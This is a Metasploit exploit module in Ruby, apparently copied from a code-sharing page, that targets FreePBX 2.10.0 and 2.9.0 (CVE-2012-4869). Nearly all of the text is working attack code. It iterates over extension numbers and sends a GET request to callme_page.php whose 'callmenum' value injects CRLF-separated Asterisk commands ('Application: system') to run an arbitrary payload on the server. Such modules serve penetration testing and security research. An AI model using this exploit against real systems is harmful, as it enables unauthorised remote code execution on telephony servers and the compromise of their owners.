Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ManualRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution',
14
      'Description'    => %q{
15
        This module exploits FreePBX version 2.10.0,2.9.0 and possibly older.
16
        Due to the way callme_page.php handles the 'callmenum' parameter, it
17
        is possible to inject code to the '$channel' variable in function
18
        callme_startcall in order to gain remote code execution.
19

20
        Please note in order to use this module properly, you must know the
21
        extension number, which can be enumerated or bruteforced, or you may
22
        try some of the default extensions such as 0 or 200.  Also, the call
23
        has to be answered (or go to voice).
24

25
        Tested on both Elastix and FreePBX ISO image installs.
26
      },
27
      'Author'         => [ 'muts','Martin Tschirsich' ],
28
      'License'        => MSF_LICENSE,
29
      'References'     =>
30
        [
31
          [ 'CVE', '2012-4869' ],
32
          [ 'OSVDB', '80544' ],
33
          [ 'EDB', '18649' ]
34
        ],
35
      'Platform'       => ['unix'],
36
      'Arch'           => ARCH_CMD,
37
      'Privileged'     => false,
38
      'Payload'        =>
39
        {
40
          'Space'       => 1024,
41
          'DisableNops' => true,
42
        },
43
      'Targets'        =>
44
        [
45
          [ 'Automatic Target', { }]
46
        ],
47
      'DefaultTarget'  => 0,
48
      'DisclosureDate' => '2012-03-20'))
49

50
    register_options(
51
      [
52
        OptString.new("EXTENSION", [ true, "A range of Local extension numbers", "0-100" ]),
53
      ])
54
  end
55

56
  def exploit
57
    # Check range input
58
    if datastore['EXTENSION'] =~ /^(\d+)\-(\d+)$/
59
      min = $1.to_i
60
      max = $2.to_i
61
    else
62
      print_error("Please specify a range for option 'EXTENSION'")
63
      return
64
    end
65

66
    cmd = Rex::Text.uri_encode(payload.encoded)
67

68
    (min..max).each do |e|
69
      connect
70
      print_status("#{rhost}:#{rport} - Sending evil request with range #{e.to_s}")
71
      res = send_request_raw({
72
        'method' => 'GET',
73
        'uri' => "/recordings/misc/callme_page.php?action=c&callmenum="+e.to_s+"@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20#{cmd}%0D%0A%0D%0A",
74
        'version' => '1.0',
75
        'vhost'   => rhost
76
      })
77
      handler
78
      disconnect
79
    end
80
  end
81
end
82

83

84